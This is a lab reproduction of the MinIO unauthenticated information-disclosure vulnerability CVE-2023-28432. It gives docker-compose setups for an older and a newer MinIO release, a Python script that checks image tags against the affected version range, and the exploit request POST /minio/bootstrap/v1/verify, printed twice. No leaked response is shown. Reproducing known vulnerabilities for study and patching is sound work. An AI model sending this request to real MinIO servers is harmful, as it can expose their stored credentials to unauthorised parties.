MinIO Unauthenticated Information Disclosure (CVE-2023-28432)
Affected versions:
MinIO RELEASE.2019-12-17T23-16-33Z <= version < MinIO RELEASE.2023-03-20T20-16-18Z
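The affected range above can be checked mechanically against the image tags in a compose file. The following is an added example, not part of the original post or of MinIO's own tooling; the function names and the SAMPLE compose text are constructed for illustration, and a tag without a release date (such as latest) is reported as unknown rather than guessed.

```python
import re
from datetime import datetime, timezone

# Bounds taken from the affected range stated above.
FIRST_AFFECTED = "RELEASE.2019-12-17T23-16-33Z"
FIRST_FIXED = "RELEASE.2023-03-20T20-16-18Z"

TAG_RE = re.compile(r"RELEASE\.(\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2}Z)")
IMAGE_RE = re.compile(r"^\s*image:\s*[\"']?(\S*minio\S*?)[\"']?\s*$", re.M)

def parse_release(tag):
    """Return the UTC timestamp encoded in a MinIO release tag, or None."""
    m = TAG_RE.search(tag)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H-%M-%SZ")
    return ts.replace(tzinfo=timezone.utc)

def is_affected(tag):
    """True/False for a dated tag; None when the tag carries no release
    date (e.g. 'latest') and the image itself has to be inspected."""
    ts = parse_release(tag)
    if ts is None:
        return None
    return parse_release(FIRST_AFFECTED) <= ts < parse_release(FIRST_FIXED)

def audit_compose(text):
    """Map every MinIO image reference in a compose file to its status."""
    return {img: is_affected(img) for img in IMAGE_RE.findall(text)}

# Constructed sample input (not from a real deployment).
SAMPLE = """\
services:
  a:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
  b:
    image: minio/minio:RELEASE.2023-03-20T20-16-18Z
  c:
    image: minio/minio:latest
  d:
    image: "minio/minio:RELEASE.2019-12-17T23-16-33Z"
"""

if __name__ == "__main__":
    labels = {True: "AFFECTED", False: "ok", None: "UNKNOWN (undated tag)"}
    for image, status in audit_compose(SAMPLE).items():
        print(f"{labels[status]:22} {image}")
```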
I. Lower version
docker-compose.yml
version: '3.7'
services:
  minio1:
    image: minio/minio:RELEASE.2021-01-16T02-19-44Z
    volumes:
      - data1-1:/data1
      - data1-2:/data2
    ports:
      - "9000:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3
## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
  data1-1:
  data1-2:
Start it:
[root@localhost momo]#
[root@localhost momo]# docker-compose -f docker-compose2.yml up
Building with native build. Learn about native build in Compose here: https://docs.docker.com/go/compose-native-build/
Pulling minio1 (minio/minio:RELEASE.2021-01-16T02-19-44Z)...
RELEASE.2021-01-16T02-19-44Z: Pulling from minio/minio
a6b97b4963f5: Pull complete
13948a011eec: Pull complete
b27f7b93c977: Pull complete
527a35f50a95: Pull complete
bae74d83b250: Pull complete
0f5c2801c42c: Pull complete
23c30f3146bf: Pull complete
Digest: sha256:a176d2194523a587f4103bce5e8d408e7aadc737e7e67067ca9c195a2b69fbe4
Status: Downloaded newer image for minio/minio:RELEASE.2021-01-16T02-19-44Z
Recreating momo_minio1_1 ... done
After starting, wait about a minute before the service becomes reachable.
Access it:
Test it:
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.69.81:9000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

On the lower version, the response contains no information at all.
II. Higher version
version: '3.7'
# starts 4 docker containers running minio server instances. Each
# minio server's web interface will be accessible on the host at port
# 9001 through 9004.
services:
  minio1:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio1
    volumes:
      - data1-1:/data1
      - data1-2:/data2
    ports:
      - "9001:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3
  minio2:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio2
    volumes:
      - data2-1:/data1
      - data2-2:/data2
    ports:
      - "9002:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3
  minio3:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio3
    volumes:
      - data3-1:/data1
      - data3-2:/data2
    ports:
      - "9003:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3
  minio4:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio4
    volumes:
      - data4-1:/data1
      - data4-2:/data2
    ports:
      - "9004:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3
## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
  data1-1:
  data1-2:
  data2-1:
  data2-2:
  data3-1:
  data3-2:
  data4-1:
  data4-2:
Start it:
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.69.81:9000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close



